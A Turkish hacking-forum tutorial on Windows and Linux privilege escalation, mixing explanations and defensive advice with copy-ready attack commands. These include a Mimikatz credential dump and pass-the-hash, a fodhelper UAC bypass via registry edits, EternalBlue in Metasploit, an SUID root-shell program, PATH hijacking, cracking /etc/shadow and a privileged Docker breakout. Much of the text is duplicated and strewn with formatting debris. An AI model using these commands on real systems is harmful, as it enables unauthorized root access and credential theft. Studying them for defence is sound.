![exploitdb.png](https://dashboard.snapcraft.io/site_media/appmedia/2022/09/exploitdb.png)
Selamlar TurkHackTeam,
Siber güvenlik dünyasında, yetkisiz erişimlerin önlenmesi ve sistem bütünlüğünün korunması büyük önem taşır. Bu bağlamda, "Privilege Escalation" (yetki yükseltme) kavramı, bir saldırganın veya yetkisiz bir kullanıcının mevcut yetki seviyesini artırarak daha yüksek yetkiler elde etmesini ve sistemde kritik değişiklikler yapabilmesini ifade eder. Bu konumuzda, privilege escalation tekniklerini, kullanılan yöntemleri ve bu tehditlere karşı alınabilecek önlemleri detaylı bir şekilde ele alacağız.
Öncelikle Privilege Escalation başlığımızı temelden alalım ve ardından derinlemesine inceleyelim.
Privilege Escalation Nedir?
Privilege escalation (yetki yükseltme), bir kullanıcının veya uygulamanın mevcut yetki seviyesini artırarak daha yüksek seviyede yetkiler elde etme sürecidir. Bu işlem, bir sistemde düşük seviyeli bir kullanıcıyken, daha yüksek yetkilerle (örneğin, yönetici veya root haklarıyla) işlem yapabilme imkanı sağlar.
Vertical Privilege Escalation (Dikey Yetki Yükseltme)
Bu durumda, bir kullanıcı daha yüksek bir yetki seviyesine yükselir. Örneğin, bir standart kullanıcı hesabının yönetici (root) yetkilerine erişim sağlaması.
Horizontal Privilege Escalation (Yatay Yetki Yükseltme)
Bu türde, bir kullanıcı kendi yetki seviyesindeki başka bir kullanıcının haklarını elde eder. Örneğin, bir kullanıcının aynı yetki seviyesine sahip başka bir kullanıcının verilerine veya hesaplarına erişmesi.
Privilege Escalation Sürecinde Kullanılan Yöntemler
Exploiting Vulnerabilities (Zafiyetlerin İstismarı)
Buffer Overflows (Tampon Taşması): Bellek taşması zafiyetleri, saldırganın kod yürütmesine veya yetki yükseltmesine izin verebilir.
Race Conditions (Yarış Durumları): Kaynak erişimi yarış durumları, saldırganın kritik sistem dosyalarına erişmesine veya bunları değiştirmesine olanak tanır.
Kernel Exploits (Çekirdek İstismarı): Çekirdek seviyesindeki zafiyetler, saldırganların doğrudan yönetici hakları elde etmesine izin verebilir.
Misconfigurations (Yanlış Yapılandırmalar)
Incorrect File Permissions (Yanlış Dosya İzinleri): Yanlış yapılandırılmış dosya izinleri, kullanıcıların yüksek yetkili dosyalara erişim sağlamasına neden olabilir.
Weak Sudo Configurations (Zayıf Sudo Yapılandırmaları): Yanlış yapılandırılmış sudo kuralları, kullanıcıların şifresiz yönetici yetkisi elde etmesine izin verebilir.
Credential Exploitation (Kimlik Bilgilerinin İstismarı)
Password Cracking (Parola Kırma): Zayıf veya varsayılan parolalar, saldırganların başka hesaplara erişim sağlamasına neden olabilir.
Token Hijacking (Token Ele Geçirme): Oturum tokenları veya erişim anahtarlarının ele geçirilmesi, saldırganların yüksek yetkili oturumlara erişimini sağlayabilir.
Abusing Trusted Relationships (Güven İlişkilerinin Kötüye Kullanımı)
Trust Exploitation (Güvenin Kötüye Kullanılması): Güvenilir sistemler veya kullanıcılar arasındaki ilişkilerin kötüye kullanılması, yetki yükseltmeye yol açabilir.
Service Exploitation (Servis İstismarı): Yanlış yapılandırılmış veya güvensiz servisler, saldırganların yüksek yetkili hesaplar elde etmesine izin verebilir.
Vertical Privilege Escalation (Dikey Yetki Yükseltme)
Bu durumda, bir kullanıcı daha yüksek bir yetki seviyesine yükselir. Örneğin, bir standart kullanıcı hesabının yönetici (root) yetkilerine erişim sağlaması.
Horizontal Privilege Escalation (Yatay Yetki Yükseltme)
Bu türde, bir kullanıcı kendi yetki seviyesindeki başka bir kullanıcının haklarını elde eder. Örneğin, bir kullanıcının aynı yetki seviyesine sahip başka bir kullanıcının verilerine veya hesaplarına erişmesi.
Privilege Escalation Sürecinde Kullanılan Yöntemler
Exploiting Vulnerabilities (Zafiyetlerin İstismarı)
Buffer Overflows (Tampon Taşması): Bellek taşması zafiyetleri, saldırganın kod yürütmesine veya yetki yükseltmesine izin verebilir.
Race Conditions (Yarış Durumları): Kaynak erişimi yarış durumları, saldırganın kritik sistem dosyalarına erişmesine veya bunları değiştirmesine olanak tanır.
Kernel Exploits (Çekirdek İstismarı): Çekirdek seviyesindeki zafiyetler, saldırganların doğrudan yönetici hakları elde etmesine izin verebilir.
![1995802.png](https://cdn-icons-png.flaticon.com/512/1995/1995802.png)
Misconfigurations (Yanlış Yapılandırmalar)
Incorrect File Permissions (Yanlış Dosya İzinleri): Yanlış yapılandırılmış dosya izinleri, kullanıcıların yüksek yetkili dosyalara erişim sağlamasına neden olabilir.
Weak Sudo Configurations (Zayıf Sudo Yapılandırmaları): Yanlış yapılandırılmış sudo kuralları, kullanıcıların şifresiz yönetici yetkisi elde etmesine izin verebilir.
![1298514.png](https://cdn-icons-png.flaticon.com/512/1298/1298514.png)
Credential Exploitation (Kimlik Bilgilerinin İstismarı)
Password Cracking (Parola Kırma): Zayıf veya varsayılan parolalar, saldırganların başka hesaplara erişim sağlamasına neden olabilir.
Token Hijacking (Token Ele Geçirme): Oturum tokenları veya erişim anahtarlarının ele geçirilmesi, saldırganların yüksek yetkili oturumlara erişimini sağlayabilir.
![6170013.png](https://cdn-icons-png.flaticon.com/512/6170/6170013.png)
Abusing Trusted Relationships (Güven İlişkilerinin Kötüye Kullanımı)
Trust Exploitation (Güvenin Kötüye Kullanılması): Güvenilir sistemler veya kullanıcılar arasındaki ilişkilerin kötüye kullanılması, yetki yükseltmeye yol açabilir.
Service Exploitation (Servis İstismarı): Yanlış yapılandırılmış veya güvensiz servisler, saldırganların yüksek yetkili hesaplar elde etmesine izin verebilir.
![1059643.png](https://cdn-icons-png.flaticon.com/512/1059/1059643.png)
Örnek Senaryolar
Linux'ta Privilege Escalation
SUID Binaries: Yanlış yapılandırılmış SUID bit'li dosyalar, saldırganların root yetkileriyle işlem yapmasına neden olabilir.
Bash:
find / -perm -4000 -type f 2>/dev/null
Kernel Exploits: Çekirdek zafiyetlerinden yararlanarak root yetkileri elde edilebilir. Bu tür zafiyetler genellikle Exploit-DB gibi veritabanlarında bulunabilir.
Kod:
CVE-XXXX-XXXX - Linux Kernel Exploit[/COLOR][/SIZE][/CENTER][/COLOR][/SIZE][/CENTER]
[SIZE=5][COLOR=rgb(255, 255, 255)][CENTER][SIZE=5][COLOR=rgb(255, 255, 255)][CENTER]
Windows'ta Privilege Escalation
Misconfigured Services
Yanlış yapılandırılmış servislerin haklarını yükseltmek için kullanılabilir. Örneğin, servislerin SYSTEM hesabıyla çalışması.
Token Manipulation
Oturum tokenlarının ele geçirilmesi ve SYSTEM tokenlarının kötüye kullanılmasıyla yetki yükseltme sağlanabilir.
Yanlış yapılandırılmış servislerin haklarını yükseltmek için kullanılabilir. Örneğin, servislerin SYSTEM hesabıyla çalışması.
Token Manipulation
Oturum tokenlarının ele geçirilmesi ve SYSTEM tokenlarının kötüye kullanılmasıyla yetki yükseltme sağlanabilir.
Kod:
windows/token_manipulation[/COLOR][/SIZE][/CENTER][/COLOR][/SIZE][/CENTER]
[SIZE=5][COLOR=rgb(255, 255, 255)][CENTER][SIZE=5][COLOR=rgb(255, 255, 255)][CENTER]
Privilege escalation, sistem güvenliği için ciddi bir tehdittir ve hem yatay hem de dikey yetki yükseltme yollarıyla gerçekleştirilebilir. Bu zafiyetlerin ve yanlış yapılandırmaların anlaşılması ve önlenmesi, sistem güvenliğinin sağlanmasında kritik öneme sahiptir.
Temel girişimiz bittiğine göre derinlemesine incelemeye başlayabiliriz.
Privilege Escalation Windows
Windows işletim sisteminde bu süreç, çeşitli zayıflıklardan ve yanlış yapılandırmalardan yararlanılarak gerçekleştirilebilir.
![You-master-art-barging-closed-rooms.gif](https://media1.popsugar-assets.com/files/thumbor/7TIhDANV8eYofnrScf9xaPDmOCg/fit-in/1200x630/filters:format_auto-!!-:strip_icc-!!-:fill-!white!-/2014/06/30/915/n/24155406/b3cc39c688039019_doors/i/You-master-art-barging-closed-rooms.gif)
Privilege Escalation Windows
Windows işletim sisteminde bu süreç, çeşitli zayıflıklardan ve yanlış yapılandırmalardan yararlanılarak gerçekleştirilebilir.
Misconfigured Permissions (Yanlış Yapılandırılmış İzinler)
File and Folder Permissions (Dosya ve Klasör İzinleri)
Yanlış yapılandırılmış dosya ve klasör izinleri, saldırganların yetki yükseltme yapmasına neden olabilir.
Örnek: Eğer bir dosya veya klasör, "Everyone" veya "Authenticated Users" grubuna yazma izni veriyorsa, saldırgan bu dosya veya klasörü değiştirerek kötü amaçlı bir kod çalıştırabilir.
Kontrol Komutu:
Örnek: Eğer bir dosya veya klasör, "Everyone" veya "Authenticated Users" grubuna yazma izni veriyorsa, saldırgan bu dosya veya klasörü değiştirerek kötü amaçlı bir kod çalıştırabilir.
Kontrol Komutu:
icacls C:\path\to\folder
Service Permissions (Servis İzinleri)
Windows servislerinin çalıştırma izinleri yanlış yapılandırılmış olabilir. Bu, saldırganların servislerin konfigürasyonunu değiştirerek yetki yükseltmelerine olanak tanır.
Kontrol Komutu:
Kontrol Komutu:
sc qc ServiceName
turkhackteam.org // ch
Vulnerable Software (Güvenlik Açığı Olan Yazılımlar)
Outdated Software (Güncellenmemiş Yazılımlar)
Güncellenmemiş yazılımlar, bilinen zafiyetlere sahip olabilir ve bu zafiyetler exploit araçları kullanılarak kötüye kullanılabilir.
Kullanılabilecek Araçlar:
>>> Metasploit <<<
>>> Nessus <<<
Metasploit Örneği:
Kullanılabilecek Araçlar:
>>> Metasploit <<<
>>> Nessus <<<
Metasploit Örneği:
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
Token Manipulation (Token Manipülasyonu)
Windows işletim sisteminde süreçler belirli token'larla çalışır. Bu token'lar manipüle edilerek yetki yükseltme sağlanabilir.
Örnek Araç: Incognito
Örnek Araç: Incognito
incognito.exe -t "Administrators"
Exploiting Kernel Vulnerabilities (Çekirdek Zafiyetlerinin İstismarı)
Kernel seviyesindeki zafiyetler, yüksek seviyeli yetki elde etmek için kullanılabilir. Bu zafiyetler, özellikle güncellenmemiş sistemlerde bulunur.
Exploit-DB'den Örnek:
Exploit-DB'den Örnek:
CVE-XXXX-XXXX - Windows Kernel Exploit
DLL Hijacking (DLL Kaçırma)
Yanlış yapılandırılmış uygulamalar, DLL dosyalarını yanlış yerlerden yükleyebilir. Saldırganlar, kendi kötü amaçlı DLL dosyalarını oluşturup bu uygulamalar tarafından yüklenmesini sağlayabilir.
Örnek Kötü Amaçlı DLL Kodu:
Örnek Kötü Amaçlı DLL Kodu:
#include <windows.h>
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
// Kötü amaçlı kod
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
turkhackteam.org // ch
Pass-the-Hash Attacks (Hash ile Kimlik Doğrulama)
Hash'ları kullanarak kimlik doğrulama işlemi gerçekleştirilir. Mimikatz gibi araçlarla bu hash'ları çıkarabilirsiniz.
Mimikatz Örneği:
Mimikatz Örneği:
mimikatz.exe
sekurlsa::logonpasswords
UAC Bypass (Kullanıcı Hesabı Denetimi Atlatma)
UAC'yi atlatmak için çeşitli teknikler kullanılabilir. Örneğin, fodhelper.exe kullanılarak kayıt defteri manipülasyonu yapılabilir.
Kayıt Defteri Manipülasyonu:
Kayıt Defteri Manipülasyonu:
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v "DelegateExecute" /d "" /f
fodhelper.exe
Insecure Service Executables (Güvenli Olmayan Hizmet Yürütülebilir Dosyaları)
Bazı hizmetler güvenli olmayan dizinlerden veya yürütülebilir dosyalardan çalıştırılır. AccessChk aracıyla hizmet yürütülebilir dosya izinlerini kontrol edebilirsiniz.
AccessChk Örneği:
AccessChk Örneği:
accesschk.exe -uwcqv "Authenticated Users" *
Named Pipe Impersonation (Adlandırılmış Boru Taklidi)
Named pipe'lar, Windows'da süreçler arası iletişim için kullanılır ve kötüye kullanılabilir. Kötü amaçlı bir yazılım, pipe aracılığıyla sistem hizmetlerini taklit edebilir.
Mimikatz Örneği:
Mimikatz Örneği:
mimikatz.exe
privilege::debug
token::elevate
Token Duplication (Token Çoğaltma)
Windows token sisteminde, mevcut bir sürecin token'ını kopyalayarak yetki yükseltme gerçekleştirilebilir. Mimikatz aracı bu amaçla kullanılabilir.
Mimikatz Örneği:
Mimikatz Örneği:
mimikatz.exe
sekurlsa :: pth /user:Administrator /ntlm:<hash> /run:cmd.exe
Dikkat: "sekurlsa :: pth" komutunu çalıştırırken arasına boşluk koymayınız.
Önleme ve Güvenlik Tavsiyeleri
Güncellemeler ve Yamalar
>> Tüm yazılımları ve işletim sistemini güncel tutarak bilinen zafiyetlerin istismar edilmesini önleyin.
turkhackteam.org // ch
turkhackteam.org // ch
Güvenli Yapılandırmalar
>> Sudoers dosyasını dikkatlice yapılandırın.
>> SUID bit'lerinin yalnızca gerçekten gerekli dosyalarda olmasını sağlayın.
>> Hizmetlerin ve uygulamaların doğru izinlerle çalıştırıldığından emin olun.
>> SUID bit'lerinin yalnızca gerçekten gerekli dosyalarda olmasını sağlayın.
>> Hizmetlerin ve uygulamaların doğru izinlerle çalıştırıldığından emin olun.
Kullanıcı Hakları Yönetimi
>> Kullanıcı haklarını minimum ayrıcalık ilkesine göre verin.
>> Yalnızca gerektiğinde yönetici haklarını kullanın.
>> Yalnızca gerektiğinde yönetici haklarını kullanın.
İzleme ve Loglama
>> Sistem loglarını düzenli olarak izleyin ve analiz edin.
>> Anormal aktiviteleri tespit etmek için log analiz araçları kullanın.
>> Anormal aktiviteleri tespit etmek için log analiz araçları kullanın.
Uygulama Güvenliği
>> Uygulamalarınızı düzenli olarak güvenlik açıklarına karşı tarayın.
>> Güvenlik duvarları ve anti-virüs yazılımları kullanarak sistemi koruyun.
>> Güvenlik duvarları ve anti-virüs yazılımları kullanarak sistemi koruyun.
Saldırı Tespit Sistemleri (IDS) ve İzleme
>> IDS ve IPS (Intrusion Prevention Systems) kullanarak yetki yükseltme denemelerini tespit edin. OSSEC veya Snort gibi açık kaynak IDS araçları kullanılabilir.
Güvenlik Duvarı Kuralları
>> Güvenlik duvarı kurallarını yapılandırarak yalnızca gerekli trafiğe izin verin. iptables veya Windows Firewall kullanarak ağ erişimini kısıtlayın.
Kullanıcı ve Grup Yönetimi
>> Kullanıcı ve grup izinlerini düzenli olarak kontrol edin. Gereksiz kullanıcı hesaplarını ve grupları kaldırın.
Uygulama Whitelisting
>> Yalnızca onaylı uygulamaların çalışmasına izin veren bir whitelisting çözümü kullanın. AppLocker veya SELinux gibi çözümler kullanılabilir.
Güçlü Kimlik Doğrulama ve Parola Politikaları
>> Güçlü parolalar ve çok faktörlü kimlik doğrulama (MFA) kullanarak hesap güvenliğini artırın. Parola politikalarını uygulayarak zayıf parolaların kullanımını önleyin.
Kapsamlı Güvenlik Eğitimleri
>> Kullanıcılara ve sistem yöneticilerine yönelik düzenli güvenlik eğitimleri sağlayın. Güvenlik farkındalığı artırarak sosyal mühendislik saldırılarını önleyin.
turkhackteam.org // ch
turkhackteam.org // ch
Araçlar ve Ek Kaynaklar
Windows Araçları
>> Sysinternals Suite: Gelişmiş sistem yönetim ve izleme araçları sağlar.
>> PowerSploit: PowerShell üzerinden saldırı ve yetki yükseltme modülleri içerir.
>> PowerSploit: PowerShell üzerinden saldırı ve yetki yükseltme modülleri içerir.
Ek Kaynaklar
>> Exploit Database (Exploit-DB): Güncel exploit'ler ve zafiyetler için kaynak.
turkhackteam.org // ch
>> OWASP: Güvenlik açıkları ve güvenlik önlemleri hakkında geniş bilgi sunar.
turkhackteam.org // ch
Windows sistemlerinde privilege escalation, siber güvenlikte kritik bir zayıf noktadır. Bu zayıflıkları anlamak ve önlemek için sürekli olarak sistemlerinizi güncel tutmalı, doğru yapılandırmalar yapmalı ve güvenlik önlemlerini uygulamalısınız. Hem saldırı tespit sistemleri hem de düzenli eğitimler, bu tür saldırılara karşı korunmada önemlidir.
![d013b9be540d7725fe2a7f6537d0b6c5.jpg](https://static8.tgstat.ru/channels/_0/d0/d013b9be540d7725fe2a7f6537d0b6c5.jpg)
turkhackteam.org // ch
>> OWASP: Güvenlik açıkları ve güvenlik önlemleri hakkında geniş bilgi sunar.
turkhackteam.org // ch
Windows sistemlerinde privilege escalation, siber güvenlikte kritik bir zayıf noktadır. Bu zayıflıkları anlamak ve önlemek için sürekli olarak sistemlerinizi güncel tutmalı, doğru yapılandırmalar yapmalı ve güvenlik önlemlerini uygulamalısınız. Hem saldırı tespit sistemleri hem de düzenli eğitimler, bu tür saldırılara karşı korunmada önemlidir.
![214883789-1f48e8ab-9de0-4693-b0f2-94f42e433c4f.png](https://user-images.githubusercontent.com/95465072/214883789-1f48e8ab-9de0-4693-b0f2-94f42e433c4f.png)
Linux Privilege Escalation
Privilege escalation (yetki yükseltme), bir kullanıcının mevcut yetkilerini artırarak daha yüksek seviyede yetkiler elde etmesini sağlar. Linux işletim sisteminde bu süreç, çeşitli zayıflıklardan ve yanlış yapılandırmalardan yararlanılarak gerçekleştirilebilir.
Sudo Misconfigurations (Sudo Yanlış Yapılandırmaları)
Sudoers File (Sudoers Dosyası)
Yanlış yapılandırılmış sudoers dosyası, saldırganların yetki yükseltme yapmasına neden olabilir. /etc/sudoers dosyasını düzenlerken dikkatli olunmalıdır.
turkhackteam.org // ch
Sudoers Dosyasını Kontrol Etme:
turkhackteam.org // ch
Sudoers Dosyasını Kontrol Etme:
sudo -l
NOPASSWD Option (Şifresiz Çalıştırma)
Bazı komutlar şifresiz çalıştırılabilir. Bu komutları kullanarak yetki yükseltebilirsiniz.
Örnek:
Örnek:
sudo /path/to/vulnerable/command
SUID and SGID Binaries (SUID ve SGID İkili Dosyaları)
SUID bit set edilmiş dosyalar, dosyanın sahibi olarak çalıştırılabilir. Bu, saldırganların root hakları elde etmesine neden olabilir.
SUID Dosyalarını Bulma:
SUID Dosyalarını Bulma:
find / -perm -4000 -type f 2>/dev/null
turkhackteam.org // ch
Örnek Exploit:
Örnek Exploit:
// Example of exploiting SUID binary
#include <stdio.h>
#include <stdlib.h>
int main() {
setuid(0);
system("/bin/bash");
return 0;
}
Kernel Exploits (Kernel Zafiyetlerinin İstismarı)
Kernel seviyesindeki zafiyetler, yüksek seviyeli yetki elde etmek için kullanılabilir. Bu zafiyetler, özellikle güncellenmemiş sistemlerde bulunur.
Exploit-DB'den Örnek:
Exploit-DB'den Örnek:
CVE-XXXX-XXXX - Linux Kernel Exploit
Misconfigured Services (Yanlış Yapılandırılmış Servisler)
Cron Jobs (Cron İşleri)
Yanlış yapılandırılmış cron job'lar yetki yükseltme için kullanılabilir. /etc/crontab ve /etc/cron.d/ dizinlerini kontrol edin.
Cron Dosyasını Kontrol Etme:
Cron Dosyasını Kontrol Etme:
turkhackteam.org // ch
cat /etc/crontab
Writable /etc/passwd or /etc/shadow (Yazılabilir /etc/passwd veya /etc/shadow Dosyaları)
Bu dosyaların yazılabilir olması büyük bir güvenlik açığıdır. Kullanıcı parolalarını değiştirerek root yetkisi alabilirsiniz.
Exploiting NFS Shares (NFS Paylaşımlarının İstismarı)
Yanlış yapılandırılmış NFS paylaşım izinleri yetki yükseltmeye yol açabilir. showmount -e komutuyla paylaşımları kontrol edin.
NFS Paylaşımlarını Kontrol Etme:
NFS Paylaşımlarını Kontrol Etme:
showmount -e <server>
PATH Variable Manipulation (PATH Değişkeni Manipülasyonu)
Yanlış yapılandırılmış PATH değişkeni yetki yükseltmeye neden olabilir. Kullanıcı PATH değişkenini değiştirerek kendi zararlı komutunu çalıştırabilir.
PATH Değişkenini Manipüle Etme:
turkhackteam.org // ch
PATH Değişkenini Manipüle Etme:
turkhackteam.org // ch
export PATH=/tmp:$PATH
echo "/bin/bash" > /tmp/ls
chmod +x /tmp/ls
ls
NFS Shares Exploitation (NFS Paylaşımlarının İstismarı)
NFS paylaşımlarında yanlış izinler yetki yükseltmeye yol açabilir. Root squash özelliği devre dışı bırakılmışsa, istemciler root haklarıyla dosya oluşturabilir.
NFS Paylaşımını Montajlama:
NFS Paylaşımını Montajlama:
showmount -e <server>
mount -t nfs <server>:<export> /mnt
Exploiting Weak Passwords (Zayıf Parolaların İstismarı)
Zayıf veya varsayılan parolalar, sistemdeki diğer kullanıcı hesaplarına erişim sağlar. John the Ripper veya Hydra gibi araçlarla parola kırma işlemleri yapılabilir.
John the Ripper Örneği:
John the Ripper Örneği:
john /etc/shadow
File Capabilities (Dosya Yetenekleri)
Linux'da belirli dosyalara özel yetenekler (capabilities) atanabilir. Yanlış yapılandırılmış yetenekler yetki yükseltmeye yol açabilir.
Yetenekleri Kontrol Etme:
Yetenekleri Kontrol Etme:
turkhackteam.org // ch
getcap /path/to/file
setcap cap_setuid+ep /path/to/binary
Docker Breakout (Docker Kaçışı)
Docker konteynerleri, ana sisteme erişim sağlamak için kötüye kullanılabilir. Privileged modda çalışan konteynerler özellikle risklidir.
Docker Kaçış Örneği:
Docker Kaçış Örneği:
docker run -v /:/hostOS -it --privileged <image> /bin/bash
Son düzenleme: